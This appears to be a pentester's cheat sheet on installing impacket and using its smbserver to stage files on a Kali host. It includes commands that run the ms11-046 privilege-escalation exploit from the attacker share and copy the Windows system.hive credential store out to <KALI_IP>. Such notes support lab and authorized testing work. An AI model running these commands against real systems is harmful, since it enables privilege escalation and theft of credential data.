Skip to content

impacket

Installation

git clone https://github.com/SecureAuthCorp/impacket.git /opt/tools/impacket
sudo pip3 install -r /opt/tools/impacket/requirements.txt
cd /opt/tools/impacket/ 
sudo pip3 install .
sudo python3 setup.py install

samba (on local server)

Setup SMB Server - Kali

mkdir share
/opt/impacket/examples/smbserver.py -smb2support public share
/opt/tools/impacket/examples/smbserver.py public .
/opt/tools/impacket/examples/smbserver.py -smb2support public .
in case of error on client side You can't access this shared folder because your organization's security policy block unauthenticated guest access
/opt/tools/impacket/examples/smbserver.py -smb2support -username admin -password password123 public .
/opt/tools/impacket/examples/smbserver.py -smb2support -username 'thm' -password 'Passw0rd!' public .
execute binary on windows shared via smb
//<KALI_IP>/public/ms11-046.exe
//<KALI_IP>/public/accesschk.exe -uwdq "C:\Program Files\Unquoted Path Service\"
copy file from windows to kali
copy C:\Users\admin\Desktop\system.hive \\<KALI_IP>\public\
copy file from kali to windows
copy \\<KALI_IP>\public\accesschk.exe C:\admin\Desktop\accesschk.exe